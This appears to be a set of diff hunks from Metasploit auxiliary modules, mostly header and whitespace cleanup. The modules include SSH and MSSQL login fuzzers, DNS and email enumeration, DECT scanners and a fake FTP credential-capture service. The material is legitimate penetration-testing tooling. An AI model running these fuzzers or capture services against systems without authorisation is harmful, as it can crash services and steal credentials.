print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -69,16 +69,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_ssh_version_base
"SSH-2.0-"
end
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Version Corruption',
@@ -32,37 +32,37 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
], self.class)
end
def do_ssh_version(pkt,opts={})
@connected = false
connect
@connected = true
@banner = sock.get_once(-1,opts[:banner_timeout])
return if not @banner
sock.put("#{pkt}\r\n")
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_ssh_version
cnt = 0
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
print_status("Fuzzing SSH version string with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
begin
r = do_ssh_version(str,:banner_timeout => 5)
rescue ::Interrupt
@@ -73,16 +73,16 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
if(not @banner)
print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
return
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
last_inp = @last_fuzzer_input
end
end
def make_ssh_version
"SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1"
end
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'TDS Protocol Login Request Corruption Fuzzer',
@@ -31,11 +31,11 @@ class Metasploit3 < Msf::Auxiliary
# A copy of the mssql_login method with the ability to overload each option
def make_login(opts={})
pkt = ""
idx = 0
db = ""
pkt << [
0x00000000, # Dummy size
opts[:tds_version] || 0x71000001, # TDS Version
@@ -50,42 +50,42 @@ class Metasploit3 < Msf::Auxiliary
opts[:timezone] || 0x00000000, # Time Zone
opts[:collation] || 0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( opts[:sname] || rhost )
dname = Rex::Text.to_unicode( opts[:dname] || db )
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [idx, uname.length / 2].pack('vv')
idx += uname.length
idx += uname.length
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv')
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, 0].pack('vv')
pkt << [idx, dname.length / 2].pack('vv')
idx += dname.length
idx += dname.length
# The total length has to be embedded twice more here
pkt << [
0,
@@ -93,15 +93,15 @@ class Metasploit3 < Msf::Auxiliary
0x12345678,
0x12345678
].pack('vVVV')
pkt << cname
pkt << uname
pkt << pname
pkt << aname
pkt << aname
pkt << sname
pkt << aname
pkt << dname
# Total packet length
pkt[0,4] = [pkt.length].pack('V')
@@ -113,34 +113,34 @@ class Metasploit3 < Msf::Auxiliary
pkt
end
def do_login(pkt,opts={})
@connected = false
disconnect if self.sock
connect
@connected = true
resp = mssql_send_recv(pkt,opts[:timeout])
info = {:errors => []}
info = mssql_parse_reply(resp,info)
info
end
def run
last_str = nil
last_inp = nil
last_err = nil
pkt = make_login
cnt = 0
fuzz_string_corrupt_byte_reverse(pkt) do |str|
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_login(str,:timeout => 0.50)
rescue ::Interrupt
@@ -151,12 +151,12 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
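Review bot: `idx = 0` at the top of `make_login` is a dead assignment, since `idx = pkt.size + 50` overwrites it unconditionally before any read; dropping it, or writing `idx = pkt.size + 50 # lengths below` as the first use, makes the offset bookkeeping easier to follow. The same dead `idx = 0` is in the TDS username fuzzer's `do_login`. The `pkt << [idx, aname.length / 2].pack('vv')` repeated after the `[0, 0]` entry reuses `aname` for a second field, which reads like an intentional copy of the original mssql_login layout but deserves a one-line comment saying so.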
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Fuzzer
def initialize(info = {})
super(update_info(info,
'Name' => 'TDS Protocol Login Request Username Fuzzer',
@@ -31,16 +31,16 @@ class Metasploit3 < Msf::Auxiliary
# A copy of the mssql_login method with the ability to overload each option
def do_login(opts={})
@connected = false
disconnect if self.sock
connect
@connected = true
pkt = ""
idx = 0
db = ""
pkt << [
0x00000000, # Dummy size
opts[:tds_version] || 0x71000001, # TDS Version
@@ -55,42 +55,42 @@ class Metasploit3 < Msf::Auxiliary
opts[:timezone] || 0x00000000, # Time Zone
opts[:collation] || 0x00000000 # Collation
].pack('VVVVVVCCCCVV')
cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
sname = Rex::Text.to_unicode( opts[:sname] || rhost )
dname = Rex::Text.to_unicode( opts[:dname] || db )
idx = pkt.size + 50 # lengths below
pkt << [idx, cname.length / 2].pack('vv')
idx += cname.length
pkt << [idx, uname.length / 2].pack('vv')
idx += uname.length
idx += uname.length
pkt << [idx, pname.length / 2].pack('vv')
idx += pname.length
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, sname.length / 2].pack('vv')
idx += sname.length
pkt << [0, 0].pack('vv')
pkt << [idx, aname.length / 2].pack('vv')
idx += aname.length
idx += aname.length
pkt << [idx, 0].pack('vv')
pkt << [idx, dname.length / 2].pack('vv')
idx += dname.length
idx += dname.length
# The total length has to be embedded twice more here
pkt << [
0,
@@ -98,15 +98,15 @@ class Metasploit3 < Msf::Auxiliary
0x12345678,
0x12345678
].pack('vVVV')
pkt << cname
pkt << uname
pkt << pname
pkt << aname
pkt << aname
pkt << sname
pkt << aname
pkt << dname
# Total packet length
pkt[0,4] = [pkt.length].pack('V')
@@ -117,27 +117,27 @@ class Metasploit3 < Msf::Auxiliary
pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
resp = mssql_send_recv(pkt,opts[:timeout])
info = {:errors => []}
info = mssql_parse_reply(resp,info)
info
end
def run
last_str = nil
last_inp = nil
last_err = nil
cnt = 0
fuzz_strings do |str|
# capped at 16-bit lengths
next if str.length > 65535
cnt += 1
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
begin
do_login(:uname => str, :timeout => 0.50)
rescue ::Interrupt
@@ -148,12 +148,12 @@ class Metasploit3 < Msf::Auxiliary
ensure
disconnect
end
if(not @connected)
if(last_str)
print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
print_status("Could not connect to the service: #{last_err}")
print_status("Could not connect to the service: #{last_err}")
end
return
end
+20 -15
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,28 +9,28 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require "net/dns/resolver"
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS Enumeration Module',
'Description' => %q{
'Name' => 'DNS Enumeration Module',
'Description' => %q{
This module can be used to enumerate various types of information
about a domain from a specific DNS server.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '1999-0532'],
]
))
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '1999-0532'],
]
))
register_options(
[
OptString.new('DOMAIN', [ true, "The target domain name"]),
@@ -42,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false])
], self.class)
register_advanced_options(
[
OptInt.new('THREADS', [ false, "Number of threads to use when using ENUM_BRT, ENUM_TLD, and ENUM_RVL checks", 10]),
@@ -248,7 +253,7 @@ class Metasploit3 < Msf::Auxiliary
end
a.delete_if {|x| not x.alive?} while not a.empty?
end
#-------------------------------------------------------------------------------
def bruteipv6(target, wordlist, nssrv)
print_status("Brute Forcing IPv6 addresses against Domain #{target}")
@@ -493,7 +498,7 @@ class Metasploit3 < Msf::Auxiliary
dnsbrute(datastore['DOMAIN'],datastore['WORDLIST'],datastore['NS'])
end
end
if(datastore['ENUM_IP6'])
if wldcrd & datastore['STOP_WLDCRD']
print_status("Wilcard Record Found!")
@@ -1,4 +1,7 @@
#!/usr/bin/env ruby
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -6,22 +9,23 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'net/http'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Search Engine Domain Email Address Collector',
'Description' => %q{
This module uses Google, Bing and Yahoo to create a list of
valid email addresses for the target domain.
This module uses Google, Bing and Yahoo to create a list of
valid email addresses for the target domain.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to locate email addresses for"]),
@@ -29,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
OptBool.new('SEARCH_BING', [ true, 'Enable Bing as a backend search engine', true]),
OptBool.new('SEARCH_YAHOO', [ true, 'Enable Yahoo! as a backend search engine', true]),
OptString.new('OUTFILE', [ false, "A filename to store the generated email list"]),
], self.class)
register_advanced_options(
@@ -60,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
end
return emails.uniq
end
#Search Yahoo.com for email's of target domain
def search_yahoo(targetdom)
print_status("Searching Yahoo for email addresses from #{targetdom}")
@@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
end
return emails.uniq
end
#Search Bing.com for email's of target domain
def search_bing(targetdom)
print_status("Searching Bing email addresses from #{targetdom}")
@@ -105,15 +109,15 @@ class Metasploit3 < Msf::Auxiliary
end
return emails.uniq
end
#for writing file with all email's found
def write_output(data)
print_status("Writing email address list to #{datastore['OUTFILE']}...")
print_status("Writing email address list to #{datastore['OUTFILE']}...")
::File.open(datastore['OUTFILE'], "a") do |fd|
fd.write(data)
end
end
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@@ -123,7 +127,7 @@ class Metasploit3 < Msf::Auxiliary
@proxysrv,@proxyport = nil, nil
end
print_status("Harvesting emails .....")
target = datastore['DOMAIN']
@@ -139,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
emails.each do |e|
print_status("\t#{e.to_s}")
end
write_output(emails.join("\n")) if datastore['OUTFILE']
end
end
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
+18 -8
@@ -1,10 +1,20 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::DECT_COA
def initialize
super(
'Name' => 'DECT Call Scanner',
@@ -13,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['Dedected', 'http://www.dedected.org'] ]
)
)
register_options([
OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true])
], self.class )
@@ -23,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
print_line("Time\t\t\t\tRFPI\t\tChannel")
@calls.each do |rfpi, data|
print_line("#{data['time']}\t#{data['rfpi']}\t#{data['channel']}")
end
end
end
@@ -34,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
while(true)
data = poll_coa()
puts data
end
end
end
=end
@@ -43,9 +53,9 @@ class Metasploit3 < Msf::Auxiliary
print_status("Opening interface: #{datastore['INTERFACE']}")
print_status("Using band: #{datastore['band']}")
open_coa
begin
print_status("Changing to call scan mode.")
@@ -73,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
stop_coa()
close_coa()
end
print_results
end
end
@@ -1,10 +1,20 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::DECT_COA
def initialize
super(
'Name' => 'DECT Base Station Scanner',
@@ -13,29 +23,29 @@ class Metasploit3 < Msf::Auxiliary
'Author' => [ 'DK <privilegedmode@gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['Dedected', 'http://www.dedected.org'] ]
)
)
register_options([
OptBool.new('VERBOSE',[false, 'Print out verbose information during the scan', true])
], self.class )
end
def print_results
print_line("RFPI\t\tChannel")
@base_stations.each do |rfpi, data|
print_line("#{data['rfpi']}\t#{data['channel']}")
end
end
end
def run
@base_stations = {}
print_status("Opening interface: #{datastore['INTERFACE']}")
print_status("Using band: #{datastore['band']}")
open_coa
begin
print_status("Changing to fp scan mode.")
@@ -59,13 +69,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("Switching to channel: #{channel}")
end
sleep(1)
end
end
ensure
print_status("Closing interface")
stop_coa()
close_coa()
end
print_results
end
end
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
+4 -2
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
+3 -2
@@ -1,3 +1,6 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
@@ -6,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/socket/ssl_tcp'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
@@ -9,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'net/http'
@@ -18,11 +17,14 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Pull Del.icio.us Links (URLs) for a domain',
'Description' => %q{ This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages. },
'Description' => %q{
This module pulls and parses the URLs stored by Del.icio.us users for the
purpose of replaying during a web assessment. Finding unlinked and old pages.
},
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7206 $'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
replaying during a web assessment. Finding unlinked and old pages. },
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7206 $'))
'Version' => '$Revision$'))
register_options(
[
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -27,16 +31,17 @@ class Metasploit3 < Msf::Auxiliary
requires either Basic, Digest or NTLM authentication.
},
'Author' => [ 'et', 'patrick' ],
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
[ 'MSB', 'MS09-020' ],
[ 'CVE', '2009-1535' ],
[ 'CVE', '2009-1122' ],
[ 'OSVDB', '54555' ],
[ 'BID', '34993' ],
],
'Version' => '$Revision$'))
]
))
register_options(
[
+4 -3
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
@@ -26,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary
'Author' => ['CG'],
'License' => MSF_LICENSE
)
end
def run_host(target_host)
+12 -3
@@ -1,5 +1,15 @@
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -7,12 +17,11 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::WMAPScanUniqueQuery
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'SQLMAP SQL Injection External Module',
'Description' => %q{
This module launch a sqlmap session.
This module launch a sqlmap session.
sqlmap is an automatic SQL injection tool developed in Python.
Its goal is to detect and take advantage of SQL injection
vulnerabilities on web applications. Once it detects one
+3 -1
@@ -1,3 +1,6 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
@@ -6,7 +9,6 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
@@ -21,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP Subversion Scanner',
'Version' => '$Revision: 6485 $',
'Version' => '$Revision$',
'Description' => 'Detect subversion directories and files and analize its content. Only SVN Version > 7 supported',
'Author' => ['et'],
'License' => MSF_LICENSE
+1 -3
@@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
@@ -25,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP trace.axd Content Scanner',
'Version' => '$Revision: 7605 $',
'Version' => '$Revision$',
'Description' => 'Detect trace.axd files and analize its content',
'Author' => ['c4an'],
'License' => MSF_LICENSE
+5 -2
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -8,7 +12,6 @@
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@@ -24,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'et' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 7629 $'))
'Version' => '$Revision$'))
register_options(
[
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -11,7 +11,6 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SunRPC
@@ -22,11 +21,12 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'SunRPC Portmap Program Enumerator',
'Description' => %q{
This module calls the target portmap service and enumerates all
This module calls the target portmap service and enumerates all
program entries and their running port numbers.
},
'Author' => ['<tebo [at] attackresearch.com>'],
'References' =>
'Author' => ['<tebo [at] attackresearch.com>'],
'Version' => '$Revision$',
'References' =>
[
['URL', 'http://www.ietf.org/rfc/rfc1057.txt'],
],
@@ -83,4 +83,3 @@ class Metasploit3 < Msf::Auxiliary
end
end
+3 -3
@@ -18,15 +18,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'NFS Mount Scanner',
'Description' => %q{
This module scans NFS mounts and their permissions.
},
'Author' => ['<tebo[at]attackresearch.com>'],
'References' =>
'Author' => ['<tebo[at]attackresearch.com>'],
'Version' => '$Revision$',
'References' =>
[
['CVE', '1999-0170'],
['URL', 'http://www.ietf.org/rfc/rfc1094.txt']
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
This module attempts to retrieve the sid from the Oracle XML DB httpd server,
utilizing Pete Finnigan s default oracle password list.
},
'Version' => '$Revision: 6876 $',
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ],
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@@ -5,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Telnet
+3 -3
@@ -48,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary
# X11.00 Null Auth Connect
sock.put("\x6c\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00")
response = sock.get_once
disconnect
if(response)
success = response[0,1].unpack('C')[0]
end
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
else
# X can return a reason for auth failure but we don't really care for this
end
rescue ::Rex::ConnectionError
rescue ::Errno::EPIPE
end
+2 -5
@@ -9,23 +9,20 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Authentication Capture: FTP',
'Version' => '$Revision$',
'Description' => %q{
This module provides a fake FTP service that
is designed to capture authentication credentials.
This module provides a fake FTP service that
is designed to capture authentication credentials.
},
'Author' => ['ddz', 'hdm'],
'License' => MSF_LICENSE,
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[
'Ryan Linn <sussurro[at]happypacket.net>',
],
'Version' => '$Revision$',
'License' => MSF_LICENSE,
'Actions' =>
[
@@ -49,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('PWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ])
], self.class)
register_advanced_options([
OptString.new('DOMAIN', [ false, "The default domain to use for NTLM authentication", "DOMAIN"]),
OptString.new('SERVER', [ false, "The default server to use for NTLM authentication", "SERVER"]),
@@ -1,3 +1,14 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Fake Telnet Service - Kris Katterjohn 09/28/2008
+1 -3
@@ -9,11 +9,9 @@
# http://metasploit.com/framework/
##
require 'msf/core'
#require 'rex/exploitation/javascriptosdetect'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
@@ -21,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'File Format Exploit Generator',
'Version' => '$Revision: 8210 $',
'Version' => '$Revision$',
'Description' => %q{
This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt.
},
@@ -14,7 +14,6 @@ require 'net/dns'
require 'racket'
require 'resolv'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
+40 -30
@@ -1,12 +1,22 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'net/dns'
require 'resolv'
class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'DNS Lookup Result Comparison',
'Description' => %q{
This module can be used to determine differences
@@ -22,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jul 21 2008'
))
register_options(
[
OptAddress.new('BASEDNS', [ true, 'The DNS cache server to use as a baseline', '4.2.2.3' ]),
@@ -30,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('NAMES', [ true, 'The list of host names that should be tested (comma separated)', 'www.google.com,www.yahoo.com,www.msn.com']),
OptBool.new('CHECK_AUTHORITY', [ false, 'Set this to true to verify authority records', false ]),
OptBool.new('CHECK_ADDITIONAL', [ false, 'Set this to true to verify additional records', false ]),
], self.class)
end
def run
def run
base_addr = datastore['BASEDNS']
targ_addr = datastore['TARGDNS']
check_ar = datastore['CHECK_ADDITIONAL']
@@ -44,27 +54,27 @@ class Metasploit3 < Msf::Auxiliary
names = datastore['NAMES'].split(",").map {|c| c.strip }
recurse = true
results = {}
print_status("Comparing results between #{base_addr} and #{targ_addr}...")
base_sock = Rex::Socket.create_udp(
'PeerHost' => base_addr,
'PeerPort' => 53
)
targ_sock = Rex::Socket.create_udp(
'PeerHost' => targ_addr,
'PeerPort' => 53
)
)
names.each do |entry|
entry.strip!
next if (entry.length == 0)
req = Resolv::DNS::Message.new
req.add_question(entry, Resolv::DNS::Resource::IN::A)
req.rd = recurse ? 1 : 0
buf = req.encode
print_status("Querying servers for #{entry}...")
base_sock.put(buf)
@@ -72,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
base_res, base_saddr = base_sock.recvfrom(65535, 3.0)
targ_res, targ_saddr = targ_sock.recvfrom(65535, 3.0)
if !(base_res and targ_res and base_res.length > 0 and targ_res.length > 0)
print_status(" Error: The baseline server did not respond to our request.") if ! (base_res and base_res.length > 0)
print_status(" Error: The target server did not respond to our request.") if ! (targ_res and targ_res.length > 0)
@@ -81,14 +91,14 @@ class Metasploit3 < Msf::Auxiliary
base_res = Resolv::DNS::Message.decode(base_res)
targ_res = Resolv::DNS::Message.decode(targ_res)
[base_res, targ_res].each do |res|
hkey = (res == base_res) ? :base : :targ
rrset = res.answer
rrset += res.authority if check_aa
rrset += res.additional if check_ar
(rrset).each do |ref|
name,ttl,data = ref
@@ -104,7 +114,7 @@ class Metasploit3 < Msf::Auxiliary
when 'TXT'
data = data.strings.join
when 'CNAME'
data = data.name.to_s
data = data.name.to_s
else
data = anst
end
@@ -116,20 +126,20 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
[ base_sock, targ_sock ].each {|s| s.close }
print_status("Analyzing results for #{results.keys.length} entries...")
